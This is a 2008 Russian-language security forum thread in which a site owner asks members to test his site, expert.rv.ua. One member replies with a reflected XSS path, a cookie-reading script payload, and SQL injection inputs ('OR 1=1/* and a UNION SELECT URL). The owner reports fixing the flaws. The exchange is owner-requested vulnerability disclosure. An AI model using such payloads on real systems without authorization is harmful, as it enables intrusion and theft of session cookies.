ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Проверка на уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

http://expert.rv.ua/
  #1  
Старый 12.04.2008, 22:13
n0153r
Постоянный
Регистрация: 19.06.2007
Сообщений: 315
Провел на форуме:
1174546

Репутация: 326
Отправить сообщение для n0153r с помощью ICQ
Exclamation http://expert.rv.ua/

Прошу проверить http://expert.rv.ua/
Движок свой.
Форум РНРВВ.
 

  #2  
Старый 13.04.2008, 20:40
desTiny
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
Провел на форуме:
3008839

Репутация: 1502


По умолчанию

А на русской мовi нету?
__________________
Bedankt euch dafür bei euch selbst.

H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
 

  #3  
Старый 14.04.2008, 01:05
n0153r
Постоянный
Регистрация: 19.06.2007
Сообщений: 315
Провел на форуме:
1174546

Репутация: 326
Отправить сообщение для n0153r с помощью ICQ
Exclamation

Цитата:
Сообщение от desTiny  
А на русской мовi нету?
Ну а какая разница ?
Если уж так нужно вот :
http://translate.google.com/translate_t?hl=ru
http://pereklad.online.ua/
Переводи если что неясно.
Или говори я тебе переведу.

Последний раз редактировалось n0153r; 14.04.2008 в 01:08..
 

  #4  
Старый 14.04.2008, 07:34
Shawn1x
Banned
Регистрация: 24.08.2007
Сообщений: 201
Провел на форуме:
983157

Репутация: 424
Отправить сообщение для Shawn1x с помощью ICQ
По умолчанию

Там не на русском написано! Как проверять?

*halkfild:
тебе сильно нужен контент.. или ты совсем не понимаешь, что там написано? /*одно с решений для непонятливых написано выше.. меньше оффтопа, пишите уязвимости =\*/

Последний раз редактировалось halkfild; 14.04.2008 в 10:54..
 

  #5  
Старый 14.04.2008, 10:04
LEE_ROY
Постоянный
Регистрация: 09.11.2006
Сообщений: 639
Провел на форуме:
1917742

Репутация: 541


По умолчанию

бле на русском нен а русском там идут пост и гет запросы, а они все одинаковые. проверять как обычно, ничего непоменялось.=\
 

  #6  
Старый 14.04.2008, 10:20
lsass.exe
Участник форума
Регистрация: 05.08.2007
Сообщений: 236
Провел на форуме:
4625160

Репутация: 457
По умолчанию

глянул, вроде все норм. Смотрел только сайт, на форум не заходил
 

  #7  
Старый 15.04.2008, 06:25
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

При выключеном экранировании (непомню как точно это называется) возможна XSS
_http://expert.rv.ua/index.php/xsshere
в js такая штука
uri = "/index.php/xsshere";
===============
Подозрение на SQL Inj
Жмакаем "Забули пароль?"
Пишем логин "loleg" мыло "loleg@mail.ru"
Отвечает "Невірний логін!"

Пишем логин 'OR 1=1/* мыло "loleg@mail.ru"
Отвечает "E-mail не відповідає E-mail введеному при регістрації!" тоесть пропускает запрос
===============
Вывода нет (а может и есть лень копать)
_http://expert.rv.ua/?rs=cpc&rst=&rsrnd=1201&rsargs[]=-2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,1,12/*&rsargs[]=18&rsargs[]=4&rsargs[]=0

<offtop>Бойтесь мну </offtop>

Последний раз редактировалось Ponchik; 15.04.2008 в 06:56..
 

  #8  
Старый 15.04.2008, 23:04
n0153r
Постоянный
Регистрация: 19.06.2007
Сообщений: 315
Провел на форуме:
1174546

Репутация: 326
Отправить сообщение для n0153r с помощью ICQ
Exclamation

Цитата:
Сообщение от Ponchik  
При выключеном экранировании (непомню как точно это называется) возможна XSS
_http://expert.rv.ua/index.php/xsshere
в js такая штука
uri = "/index.php/xsshere";
===============
Подозрение на SQL Inj
Жмакаем "Забули пароль?"
Пишем логин "loleg" мыло "loleg@mail.ru"
Отвечает "Невірний логін!"

Пишем логин 'OR 1=1/* мыло "loleg@mail.ru"
Отвечает "E-mail не відповідає E-mail введеному при регістрації!" тоесть пропускает запрос
===============
Вывода нет (а может и есть лень копать)
_http://expert.rv.ua/?rs=cpc&rst=&rsrnd=1201&rsargs[]=-2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,1,12/*&rsargs[]=18&rsargs[]=4&rsargs[]=0

<offtop>Бойтесь мну </offtop>
Спасибо большое поправил.
С меня +
 

  #9  
Старый 16.04.2008, 00:31
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

В догонку
_http://expert.rv.ua/?rs=<script>alert(document.cookie)</script>

Последний раз редактировалось Ponchik; 16.04.2008 в 01:33..
 

  #10  
Старый 11.05.2008, 14:03
n0153r
Постоянный
Регистрация: 19.06.2007
Сообщений: 315
Провел на форуме:
1174546

Репутация: 326
Отправить сообщение для n0153r с помощью ICQ
По умолчанию

Всем спасибо тогда за то что указали на слабие места
Снимаю сайт с проверки.
 
Закрытая тема





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ